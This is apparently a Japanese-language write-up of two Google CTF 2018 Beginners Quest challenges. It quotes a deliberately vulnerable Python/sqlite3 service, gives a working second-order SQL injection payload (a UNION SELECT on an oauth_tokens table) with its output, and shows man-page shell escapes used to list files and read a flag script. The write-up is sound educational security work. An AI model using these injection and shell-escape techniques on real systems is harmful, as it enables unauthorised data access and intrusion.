2018/11/12

Google CTF Beginners Quest MEDIA-DB

sqlite3を操作するpythonスクリプトが与えられる。

スクリプト起動時にoauth_tokens tableのoauth_token columnへフラグが登録される。

with open('oauth_token') as fd:
  flag = fd.read()

conn = sqlite3.connect(':memory:')
c = conn.cursor()

c.execute("CREATE TABLE oauth_tokens (oauth_token text)")
c.execute("CREATE TABLE media (artist text, song text)")
c.execute("INSERT INTO oauth_tokens VALUES ('{}')".format(flag))

その後いくつかの機能が実行可能だが、insert機能でシングルクオートのエスケープを行なっていない。

  if choice == '1':
    my_print("artist name?")
    artist = raw_input().replace('"', "")
    my_print("song name?")
    song = raw_input().replace('"', "")
    c.execute("""INSERT INTO media VALUES ("{}", "{}")""".format(artist, song))

そしてmedia tableからランダムなartistを取り出し、結果をそのままwhereに利用する機能が存在する。

  elif choice == '4':
    artist = random.choice(list(c.execute("SELECT DISTINCT artist FROM media")))[0]
    my_print("choosing songs from random artist: {}".format(artist))
    print_playlist("SELECT artist, song FROM media WHERE artist = '{}'".format(artist))

よってoauth_tokenの値が取得可能な文字列をartist名としてinsert後、ランダム機能によりその文字列を利用することでフラグを得られる。

% nc media-db.ctfcompetition.com 1337
=== Media DB ===
1) add song
2) play artist
3) play song
4) shuffle artist
5) exit
> 1
artist name?
1' OR '1' = '1' UNION ALL SELECT oauth_token, oauth_token FROM oauth_tokens; --
song name?
a
1) add song
2) play artist
3) play song
4) shuffle artist
5) exit
> 4
choosing songs from random artist: 1' OR '1' = '1' UNION ALL SELECT oauth_token, oauth_token FROM oauth_tokens; --

== new playlist ==
1: "a" by "1' OR '1' = '1' UNION ALL SELECT oauth_token, oauth_token FROM oauth_tokens; -- "
2: "CTF{DUMMY_FLAG}
" by "CTF{DUMMY_FLAG}
"

Google CTF Beginners Quest MOAR

nc moar.ctfcompetition.com 1337を実行するとman socatが開く。!<command>でshell codeが実行可能なので、怪しいファイルを探しフラグを得る。

$ nc moar.ctfcompetition.com 1337
socat(1)                                                              socat(1)

NAME socat - Multipurpose relay (SOcket CAT)

SYNOPSIS
       socat [options] <address> <address>
       socat -V
       socat -h[h[h]] | -?[?[?]]
       filan
       procan

DESCRIPTION
       Socat  is  a  command  line based utility that establishes two bidirec-
       tional byte streams  and  transfers  data  between  them.  Because  the
       streams  can be constructed from a large set of different types of data
       sinks and sources (see address types),  and  because  lots  of  address
       options  may be applied to the streams, socat can be used for many dif-
       ferent purposes.

       Filan is a utility  that  prints  information  about  its  active  file
       descriptors  to  stdout.  It  has been written for debugging socat, but
       might be useful for other purposes too. Use the -h option to find  more
 Manual page socat(1) line 1 (press h for help or q to quit)!ls
!ls
bin   dev  home  lib64  mnt  proc  run   srv  tmp  var
boot  etc  lib   media  opt  root  sbin  sys  usr
!done  (press RETURN)!ls /home

!ls /home
moar
!done  (press RETURN)!ls /home/moar

!ls /home/moar
disable_dmz.sh
!done  (press RETURN)!cat /home/moar/disable_dmz.sh

!cat /home/moar/disable_dmz.sh
#!/bin/sh

# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

echo 'Disabling DMZ using password CTF{DUMMY_FLAG}'
echo CTF{DUMMY_FLAG} > /dev/dmz
!done  (press RETURN)